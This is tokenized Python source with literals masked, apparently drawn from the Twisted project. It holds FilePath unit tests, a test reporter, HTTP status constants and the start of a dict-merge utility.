FilePath ( b'<STR_LIT:a>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> self . failUnless ( filepath . FilePath ( b'<STR_LIT:z>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:a>' ) ) <EOL> self . failIf ( filepath . FilePath ( b'<STR_LIT:z>' ) != <EOL> filepath . FilePath ( b'<STR_LIT:z>' ) ) <EOL> def test_descendantOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> filepath . InsecurePath , self . path . descendant , [ b'<STR_LIT:a>' , b'<STR_LIT:..>' ] ) <EOL> def testSibling ( self ) : <EOL> p = self . path . child ( b'<STR_LIT>' ) <EOL> ts = p . sibling ( b'<STR_LIT>' ) <EOL> self . assertEqual ( ts . dirname ( ) , p . dirname ( ) ) <EOL> self . assertEqual ( ts . basename ( ) , b'<STR_LIT>' ) <EOL> ts . createDirectory ( ) <EOL> self . assertIn ( ts , self . path . children ( ) ) <EOL> def testTemporarySibling ( self ) : <EOL> ts = self . path . temporarySibling ( ) <EOL> self . assertEqual ( ts . dirname ( ) , self . path . dirname ( ) ) <EOL> self . assertNotIn ( ts . basename ( ) , self . path . listdir ( ) ) <EOL> ts . createDirectory ( ) <EOL> self . assertIn ( ts , self . path . parent ( ) . children ( ) ) <EOL> def test_temporarySiblingExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> testExtension = b"<STR_LIT>" <EOL> ts = self . path . temporarySibling ( testExtension ) <EOL> self . assertTrue ( ts . basename ( ) . endswith ( testExtension ) , <EOL> "<STR_LIT>" % ( <EOL> ts . basename ( ) , testExtension ) ) <EOL> def test_removeDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . path . remove ( ) <EOL> self . failIf ( self . path . exists ( ) ) <EOL> def test_removeWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> link = self . path . child ( b"<STR_LIT>" ) <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , link . path ) <EOL> link . remove ( ) <EOL> self . assertFalse ( link . exists ( ) ) <EOL> self . assertTrue ( self . path . child ( b"<STR_LIT>" ) . 
exists ( ) ) <EOL> def test_copyToDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> oldPaths = list ( self . path . walk ( ) ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp ) <EOL> self . path . remove ( ) <EOL> fp . copyTo ( self . path ) <EOL> newPaths = list ( self . path . walk ( ) ) <EOL> newPaths . sort ( ) <EOL> oldPaths . sort ( ) <EOL> self . assertEqual ( newPaths , oldPaths ) <EOL> def test_copyToMissingDestFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> nosuch = self . path . child ( b"<STR_LIT>" ) <EOL> nosuch . isfile = lambda : True <EOL> destination = ExplodingFilePath ( self . mktemp ( ) ) <EOL> self . assertRaises ( IOError , nosuch . copyTo , destination ) <EOL> self . assertTrue ( destination . fp . closed ) <EOL> def test_copyToFileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> destination = ExplodingFilePath ( self . mktemp ( ) ) <EOL> source = ExplodingFilePath ( __file__ ) <EOL> self . assertRaises ( IOError , source . copyTo , destination ) <EOL> self . assertTrue ( source . fp . closed ) <EOL> self . assertTrue ( destination . fp . closed ) <EOL> def test_copyToDirectoryItself ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ( OSError , IOError ) , <EOL> self . path . copyTo , self . path . child ( b'<STR_LIT>' ) ) <EOL> def test_copyToWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( self . path . child ( b"<STR_LIT>" ) . path , <EOL> self . path . child ( b"<STR_LIT>" ) . path ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp ) <EOL> self . assertFalse ( fp . child ( b"<STR_LIT>" ) . islink ( ) ) <EOL> self . assertEqual ( [ x . basename ( ) for x in fp . child ( b"<STR_LIT>" ) . children ( ) ] , <EOL> [ x . basename ( ) for x in fp . child ( b"<STR_LIT>" ) . children ( ) ] ) <EOL> def test_copyToWithoutSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> self . symlink ( b"<STR_LIT>" , self . path . child ( b"<STR_LIT>" ) . 
path ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . copyTo ( fp , followLinks = False ) <EOL> self . assertTrue ( fp . child ( b"<STR_LIT>" ) . islink ( ) ) <EOL> self . assertEqual ( os . readlink ( self . path . child ( b"<STR_LIT>" ) . path ) , <EOL> os . readlink ( fp . child ( b"<STR_LIT>" ) . path ) ) <EOL> def test_copyToMissingSource ( self ) : <EOL> """<STR_LIT>""" <EOL> path = filepath . FilePath ( self . mktemp ( ) ) <EOL> exc = self . assertRaises ( OSError , path . copyTo , b'<STR_LIT>' ) <EOL> self . assertEqual ( exc . errno , errno . ENOENT ) <EOL> def test_moveTo ( self ) : <EOL> """<STR_LIT>""" <EOL> oldPaths = list ( self . path . walk ( ) ) <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . path . moveTo ( fp ) <EOL> fp . moveTo ( self . path ) <EOL> newPaths = list ( self . path . walk ( ) ) <EOL> newPaths . sort ( ) <EOL> oldPaths . sort ( ) <EOL> self . assertEqual ( newPaths , oldPaths ) <EOL> def test_moveToExistsCache ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp2 = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . touch ( ) <EOL> self . assertEqual ( fp . exists ( ) , True ) <EOL> self . assertEqual ( fp2 . exists ( ) , False ) <EOL> fp . moveTo ( fp2 ) <EOL> self . assertEqual ( fp . exists ( ) , False ) <EOL> self . assertEqual ( fp2 . exists ( ) , True ) <EOL> def test_moveToExistsCacheCrossMount ( self ) : <EOL> """<STR_LIT>""" <EOL> self . setUpFaultyRename ( ) <EOL> self . test_moveToExistsCache ( ) <EOL> def test_moveToSizeCache ( self , hook = lambda : None ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp2 = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> fp2 . setContent ( b"<STR_LIT>" ) <EOL> hook ( ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:10> ) <EOL> os . remove ( fp2 . 
path ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:10> ) <EOL> fp . moveTo ( fp2 ) <EOL> self . assertEqual ( fp2 . getsize ( ) , <NUM_LIT:4> ) <EOL> def test_moveToSizeCacheCrossMount ( self ) : <EOL> """<STR_LIT>""" <EOL> self . test_moveToSizeCache ( hook = self . setUpFaultyRename ) <EOL> def test_moveToError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ( OSError , IOError ) , self . path . moveTo , self . path . child ( b'<STR_LIT>' ) ) <EOL> def setUpFaultyRename ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = [ ] <EOL> def faultyRename ( src , dest ) : <EOL> invokedWith . append ( ( src , dest ) ) <EOL> if len ( invokedWith ) == <NUM_LIT:1> : <EOL> raise OSError ( errno . EXDEV , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return originalRename ( src , dest ) <EOL> originalRename = os . rename <EOL> self . patch ( os , "<STR_LIT>" , faultyRename ) <EOL> return invokedWith <EOL> def test_crossMountMoveTo ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> self . test_moveTo ( ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_crossMountMoveToWithSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> f3 = self . path . child ( b'<STR_LIT>' ) <EOL> self . symlink ( self . path . child ( b'<STR_LIT>' ) . path , f2 . path ) <EOL> f2 . moveTo ( f3 ) <EOL> self . assertFalse ( f3 . islink ( ) ) <EOL> self . assertEqual ( f3 . getContent ( ) , b'<STR_LIT>' ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_crossMountMoveToWithoutSymlink ( self ) : <EOL> """<STR_LIT>""" <EOL> invokedWith = self . setUpFaultyRename ( ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> f3 = self . path . child ( b'<STR_LIT>' ) <EOL> self . symlink ( self . path . child ( b'<STR_LIT>' ) . path , f2 . path ) <EOL> f2 . moveTo ( f3 , followLinks = False ) <EOL> self . assertTrue ( f3 . islink ( ) ) <EOL> self . 
assertEqual ( f3 . getContent ( ) , b'<STR_LIT>' ) <EOL> self . assertTrue ( invokedWith ) <EOL> def test_createBinaryMode ( self ) : <EOL> """<STR_LIT>""" <EOL> path = filepath . FilePath ( self . mktemp ( ) ) <EOL> f = path . create ( ) <EOL> self . failUnless ( "<STR_LIT:b>" in f . mode ) <EOL> f . write ( b"<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> read = open ( path . path , "<STR_LIT:rb>" ) . read ( ) <EOL> self . assertEqual ( read , b"<STR_LIT:\n>" ) <EOL> def testOpen ( self ) : <EOL> nonexistent = self . path . child ( b'<STR_LIT>' ) <EOL> e = self . assertRaises ( IOError , nonexistent . open ) <EOL> self . assertEqual ( e . errno , errno . ENOENT ) <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> f = writer . open ( '<STR_LIT:w>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = writer . open ( ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = writer . open ( '<STR_LIT:w>' ) <EOL> f . close ( ) <EOL> f = writer . open ( ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> appender = self . path . child ( b'<STR_LIT>' ) <EOL> f = appender . open ( '<STR_LIT:w>' ) <EOL> f . write ( b'<STR_LIT:abc>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:a>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:r>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT:r>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . open ( '<STR_LIT>' ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> f = appender . 
open ( '<STR_LIT>' ) <EOL> f . write ( b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . assertEqual ( f . read ( ) , b'<STR_LIT>' ) <EOL> f . close ( ) <EOL> nonexistent . requireCreate ( True ) <EOL> nonexistent . open ( '<STR_LIT:w>' ) . close ( ) <EOL> existent = nonexistent <EOL> del nonexistent <EOL> self . assertRaises ( ( OSError , IOError ) , existent . open ) <EOL> def test_openWithExplicitBinaryMode ( self ) : <EOL> """<STR_LIT>""" <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> file = writer . open ( '<STR_LIT:wb>' ) <EOL> file . write ( b'<STR_LIT>' ) <EOL> file . close ( ) <EOL> self . assertTrue ( writer . exists ) <EOL> def test_openWithRedundantExplicitBinaryModes ( self ) : <EOL> """<STR_LIT>""" <EOL> writer = self . path . child ( b'<STR_LIT>' ) <EOL> file = writer . open ( '<STR_LIT>' ) <EOL> file . write ( b'<STR_LIT>' ) <EOL> file . close ( ) <EOL> self . assertTrue ( writer . exists ) <EOL> def test_existsCache ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> self . assertEqual ( fp . exists ( ) , False ) <EOL> fp . makedirs ( ) <EOL> self . assertEqual ( fp . exists ( ) , True ) <EOL> def test_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:5> ) <EOL> fObj = open ( fp . path , '<STR_LIT:wb>' ) <EOL> fObj . write ( b"<STR_LIT>" ) <EOL> fObj . close ( ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:5> ) <EOL> fp . changed ( ) <EOL> self . assertEqual ( fp . statinfo , None ) <EOL> self . assertEqual ( fp . getsize ( ) , <NUM_LIT:8> ) <EOL> def test_getPermissions_POSIX ( self ) : <EOL> """<STR_LIT>""" <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . 
assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) , <EOL> filepath . Permissions ( mode ) ) <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( <NUM_LIT> ) <EOL> self . assertEqual ( <EOL> self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) . shorthand ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoGetter ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo <EOL> warningInfo = self . flushWarnings ( [ self . test_deprecateStatinfoGetter ] ) <EOL> self . assertEquals ( len ( warningInfo ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEquals ( <EOL> warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoSetter ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo = None <EOL> warningInfo = self . flushWarnings ( [ self . test_deprecateStatinfoSetter ] ) <EOL> self . assertEquals ( len ( warningInfo ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEquals ( <EOL> warningInfo [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_deprecateStatinfoSetterSets ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = filepath . FilePath ( self . mktemp ( ) ) <EOL> fp . statinfo = None <EOL> self . assertEquals ( fp . statinfo , None ) <EOL> def test_filePathNotDeprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> filepath . FilePath ( self . mktemp ( ) ) <EOL> warningInfo = self . flushWarnings ( [ self . test_filePathNotDeprecated ] ) <EOL> self . assertEquals ( warningInfo , [ ] ) <EOL> def test_getPermissions_Windows ( self ) : <EOL> """<STR_LIT>""" <EOL> self . addCleanup ( self . path . child ( b"<STR_LIT>" ) . 
chmod , <NUM_LIT> ) <EOL> for mode in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( mode ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) , <EOL> filepath . Permissions ( mode ) ) <EOL> self . path . child ( b"<STR_LIT>" ) . chmod ( <NUM_LIT> ) <EOL> self . assertEqual ( self . path . child ( b"<STR_LIT>" ) . getPermissions ( ) . shorthand ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_whetherBlockOrSocket ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . path . isBlockDevice ( ) ) <EOL> self . assertFalse ( self . path . isSocket ( ) ) <EOL> def test_statinfoBitsNotImplementedInWindows ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotImplementedError , self . path . getInodeNumber ) <EOL> self . assertRaises ( NotImplementedError , self . path . getDevice ) <EOL> self . assertRaises ( NotImplementedError , self . path . getNumberOfHardLinks ) <EOL> self . assertRaises ( NotImplementedError , self . path . getUserID ) <EOL> self . assertRaises ( NotImplementedError , self . path . getGroupID ) <EOL> def test_statinfoBitsAreNumbers ( self ) : <EOL> """<STR_LIT>""" <EOL> if _PY3 : <EOL> numbers = int <EOL> else : <EOL> numbers = ( int , long ) <EOL> c = self . path . child ( b'<STR_LIT>' ) <EOL> for p in self . path , c : <EOL> self . assertIsInstance ( p . getInodeNumber ( ) , numbers ) <EOL> self . assertIsInstance ( p . getDevice ( ) , numbers ) <EOL> self . assertIsInstance ( p . getNumberOfHardLinks ( ) , numbers ) <EOL> self . assertIsInstance ( p . getUserID ( ) , numbers ) <EOL> self . assertIsInstance ( p . getGroupID ( ) , numbers ) <EOL> self . assertEqual ( self . path . getUserID ( ) , c . getUserID ( ) ) <EOL> self . assertEqual ( self . path . getGroupID ( ) , c . 
getGroupID ( ) ) <EOL> def test_statinfoNumbersAreValid ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeStat : <EOL> st_ino = <NUM_LIT:200> <EOL> st_dev = <NUM_LIT> <EOL> st_nlink = <NUM_LIT> <EOL> st_uid = <NUM_LIT> <EOL> st_gid = <NUM_LIT> <EOL> fake = FakeStat ( ) <EOL> def fakeRestat ( * args , ** kwargs ) : <EOL> self . path . _statinfo = fake <EOL> self . path . restat = fakeRestat <EOL> self . path . _statinfo = None <EOL> self . assertEqual ( self . path . getInodeNumber ( ) , fake . st_ino ) <EOL> self . assertEqual ( self . path . getDevice ( ) , fake . st_dev ) <EOL> self . assertEqual ( self . path . getNumberOfHardLinks ( ) , fake . st_nlink ) <EOL> self . assertEqual ( self . path . getUserID ( ) , fake . st_uid ) <EOL> self . assertEqual ( self . path . getGroupID ( ) , fake . st_gid ) <EOL> if platform . isWindows ( ) : <EOL> test_statinfoBitsAreNumbers . skip = True <EOL> test_statinfoNumbersAreValid . skip = True <EOL> test_getPermissions_POSIX . skip = True <EOL> else : <EOL> test_statinfoBitsNotImplementedInWindows . skip = "<STR_LIT>" <EOL> test_getPermissions_Windows . skip = "<STR_LIT>" <EOL> class SetContentTests ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_write ( self ) : <EOL> """<STR_LIT>""" <EOL> pathString = self . mktemp ( ) <EOL> path = filepath . FilePath ( pathString ) <EOL> path . setContent ( b"<STR_LIT>" ) <EOL> with open ( pathString , "<STR_LIT:rb>" ) as fObj : <EOL> contents = fObj . read ( ) <EOL> self . assertEqual ( b"<STR_LIT>" , contents ) <EOL> def test_fileClosing ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = ExplodingFilePath ( b"<STR_LIT>" ) <EOL> self . assertRaises ( IOError , fp . setContent , b"<STR_LIT>" ) <EOL> self . assertTrue ( fp . fp . closed ) <EOL> def test_nameCollision ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> fp . setContent ( b"<STR_LIT>" ) <EOL> openedSiblings = fp . openedPaths ( ) <EOL> self . 
assertEqual ( len ( openedSiblings ) , <NUM_LIT:2> ) <EOL> self . assertNotEqual ( openedSiblings [ <NUM_LIT:0> ] , openedSiblings [ <NUM_LIT:1> ] ) <EOL> def _assertOneOpened ( self , fp , extension ) : <EOL> """<STR_LIT>""" <EOL> opened = fp . openedPaths ( ) <EOL> self . assertEqual ( len ( opened ) , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> opened [ <NUM_LIT:0> ] . basename ( ) . endswith ( extension ) , <EOL> "<STR_LIT>" % ( <EOL> opened [ <NUM_LIT:0> ] . basename ( ) , extension ) ) <EOL> def test_defaultExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT:hello>" ) <EOL> self . _assertOneOpened ( fp , b"<STR_LIT>" ) <EOL> def test_customExtension ( self ) : <EOL> """<STR_LIT>""" <EOL> fp = TrackingFilePath ( self . mktemp ( ) ) <EOL> fp . setContent ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> self . _assertOneOpened ( fp , b"<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import implementer <EOL> from twisted . trial . itrial import IReporter <EOL> from twisted . python . components import proxyForInterface <EOL> @ implementer ( IReporter ) <EOL> class DistReporter ( proxyForInterface ( IReporter ) ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , original ) : <EOL> super ( DistReporter , self ) . __init__ ( original ) <EOL> self . running = { } <EOL> def startTest ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] = [ ] <EOL> self . running [ test . id ( ) ] . append ( ( self . original . startTest , test ) ) <EOL> def addFailure ( self , test , fail ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addFailure , <EOL> test , fail ) ) <EOL> def addError ( self , test , error ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addError , <EOL> test , error ) ) <EOL> def addSkip ( self , test , reason ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addSkip , <EOL> test , reason ) ) <EOL> def addUnexpectedSuccess ( self , test , todo ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addUnexpectedSuccess , <EOL> test , todo ) ) <EOL> def addExpectedFailure ( self , test , error , todo ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addExpectedFailure , <EOL> test , error , todo ) ) <EOL> def addSuccess ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . addSuccess , test ) ) <EOL> def stopTest ( self , test ) : <EOL> """<STR_LIT>""" <EOL> self . running [ test . id ( ) ] . append ( ( self . original . stopTest , test ) ) <EOL> for step in self . running [ test . id ( ) ] : <EOL> apply ( step [ <NUM_LIT:0> ] , step [ <NUM_LIT:1> : ] ) <EOL> del self . running [ test . 
id ( ) ] </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> class FooTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_first ( self ) : <EOL> pass <EOL> def test_second ( self ) : <EOL> pass <EOL> def test_third ( self ) : <EOL> pass <EOL> def test_fourth ( self ) : <EOL> pass <EOL> class BazTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_baz ( self ) : <EOL> pass <EOL> class BarTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_bar ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> _CONTINUE = <NUM_LIT:100> <EOL> SWITCHING = <NUM_LIT> <EOL> OK = <NUM_LIT:200> <EOL> CREATED = <NUM_LIT> <EOL> ACCEPTED = <NUM_LIT> <EOL> NON_AUTHORITATIVE_INFORMATION = <NUM_LIT> <EOL> NO_CONTENT = <NUM_LIT> <EOL> RESET_CONTENT = <NUM_LIT> <EOL> PARTIAL_CONTENT = <NUM_LIT> <EOL> MULTI_STATUS = <NUM_LIT> <EOL> MULTIPLE_CHOICE = <NUM_LIT> <EOL> MOVED_PERMANENTLY = <NUM_LIT> <EOL> FOUND = <NUM_LIT> <EOL> SEE_OTHER = <NUM_LIT> <EOL> NOT_MODIFIED = <NUM_LIT> <EOL> USE_PROXY = <NUM_LIT> <EOL> TEMPORARY_REDIRECT = <NUM_LIT> <EOL> BAD_REQUEST = <NUM_LIT> <EOL> UNAUTHORIZED = <NUM_LIT> <EOL> PAYMENT_REQUIRED = <NUM_LIT> <EOL> FORBIDDEN = <NUM_LIT> <EOL> NOT_FOUND = <NUM_LIT> <EOL> NOT_ALLOWED = <NUM_LIT> <EOL> NOT_ACCEPTABLE = <NUM_LIT> <EOL> PROXY_AUTH_REQUIRED = <NUM_LIT> <EOL> REQUEST_TIMEOUT = <NUM_LIT> <EOL> CONFLICT = <NUM_LIT> <EOL> GONE = <NUM_LIT> <EOL> LENGTH_REQUIRED = <NUM_LIT> <EOL> PRECONDITION_FAILED = <NUM_LIT> <EOL> REQUEST_ENTITY_TOO_LARGE = <NUM_LIT> <EOL> REQUEST_URI_TOO_LONG = <NUM_LIT> <EOL> UNSUPPORTED_MEDIA_TYPE = <NUM_LIT> <EOL> REQUESTED_RANGE_NOT_SATISFIABLE = <NUM_LIT> <EOL> EXPECTATION_FAILED = <NUM_LIT> <EOL> INTERNAL_SERVER_ERROR = <NUM_LIT> <EOL> NOT_IMPLEMENTED = <NUM_LIT> <EOL> BAD_GATEWAY = <NUM_LIT> <EOL> SERVICE_UNAVAILABLE = <NUM_LIT> <EOL> GATEWAY_TIMEOUT = <NUM_LIT> <EOL> HTTP_VERSION_NOT_SUPPORTED = <NUM_LIT> <EOL> INSUFFICIENT_STORAGE_SPACE = <NUM_LIT> <EOL> NOT_EXTENDED = <NUM_LIT> <EOL> RESPONSES = { <EOL> _CONTINUE : "<STR_LIT>" , <EOL> SWITCHING : "<STR_LIT>" , <EOL> OK : "<STR_LIT:OK>" , <EOL> CREATED : "<STR_LIT>" , <EOL> ACCEPTED : "<STR_LIT>" , <EOL> NON_AUTHORITATIVE_INFORMATION : "<STR_LIT>" , <EOL> NO_CONTENT : "<STR_LIT>" , <EOL> RESET_CONTENT : "<STR_LIT>" , <EOL> PARTIAL_CONTENT : "<STR_LIT>" , <EOL> MULTI_STATUS : "<STR_LIT>" , <EOL> MULTIPLE_CHOICE : "<STR_LIT>" , <EOL> MOVED_PERMANENTLY : "<STR_LIT>" , <EOL> FOUND : "<STR_LIT>" , 
<EOL> SEE_OTHER : "<STR_LIT>" , <EOL> NOT_MODIFIED : "<STR_LIT>" , <EOL> USE_PROXY : "<STR_LIT>" , <EOL> TEMPORARY_REDIRECT : "<STR_LIT>" , <EOL> BAD_REQUEST : "<STR_LIT>" , <EOL> UNAUTHORIZED : "<STR_LIT>" , <EOL> PAYMENT_REQUIRED : "<STR_LIT>" , <EOL> FORBIDDEN : "<STR_LIT>" , <EOL> NOT_FOUND : "<STR_LIT>" , <EOL> NOT_ALLOWED : "<STR_LIT>" , <EOL> NOT_ACCEPTABLE : "<STR_LIT>" , <EOL> PROXY_AUTH_REQUIRED : "<STR_LIT>" , <EOL> REQUEST_TIMEOUT : "<STR_LIT>" , <EOL> CONFLICT : "<STR_LIT>" , <EOL> GONE : "<STR_LIT>" , <EOL> LENGTH_REQUIRED : "<STR_LIT>" , <EOL> PRECONDITION_FAILED : "<STR_LIT>" , <EOL> REQUEST_ENTITY_TOO_LARGE : "<STR_LIT>" , <EOL> REQUEST_URI_TOO_LONG : "<STR_LIT>" , <EOL> UNSUPPORTED_MEDIA_TYPE : "<STR_LIT>" , <EOL> REQUESTED_RANGE_NOT_SATISFIABLE : "<STR_LIT>" , <EOL> EXPECTATION_FAILED : "<STR_LIT>" , <EOL> INTERNAL_SERVER_ERROR : "<STR_LIT>" , <EOL> NOT_IMPLEMENTED : "<STR_LIT>" , <EOL> BAD_GATEWAY : "<STR_LIT>" , <EOL> SERVICE_UNAVAILABLE : "<STR_LIT>" , <EOL> GATEWAY_TIMEOUT : "<STR_LIT>" , <EOL> HTTP_VERSION_NOT_SUPPORTED : "<STR_LIT>" , <EOL> INSUFFICIENT_STORAGE_SPACE : "<STR_LIT>" , <EOL> NOT_EXTENDED : "<STR_LIT>" <EOL> } </s>
<s> from __future__ import ( unicode_literals , division , absolute_import , print_function ) <EOL> REMOVE_THIS_KEY = object ( ) <EOL> def mergeargs ( argvalue , remove = False ) : <EOL> if not argvalue : <EOL> return None <EOL> r = { } <EOL> for subval in argvalue : <EOL> mergedicts ( r , dict ( [ subval ] ) , remove = remove ) <EOL> return r <EOL> def _clear_special_values ( d ) : <EOL> '''<STR_LIT>''' <EOL> l = [ d ] <EOL> while l : <EOL> i = l . pop ( ) <EOL> pops = [ ] <EOL> for k , v in i . items ( ) : <EOL> if v is REMOVE_THIS_KEY : <EOL> pops . append ( k ) <EOL> elif isinstance ( v , dict ) : <EOL> l . append ( v ) <EOL> for k in pops : <EOL> i . pop ( k ) <EOL> def mergedicts ( d1 , d2 , remove = True ) : <EOL> '''<STR_LIT>''' <EOL> _setmerged ( d1 , d2 ) <EOL> for k in d2 : <EOL> if k in d1 and isinstance ( d1 [ k ] , dict ) and isinstance ( d2 [ k ] , dict ) : <EOL> mergedicts ( d1 [ k ] , d2 [ k ] , remove ) <EOL> elif remove and d2 [ k ] is REMOVE_THIS_KEY : <EOL> d1 . pop ( k , None ) <EOL> else : <EOL> if remove and isinstance ( d2 [ k ] , dict ) : <EOL> _clear_special_values ( d2 [ k ] ) <EOL> d1 [ k ] = d2 [ k ] <EOL> def mergedefaults ( d1 , d2 ) : <EOL> '''<STR_LIT>''' <EOL> for k in d2 : <EOL> if k in d1 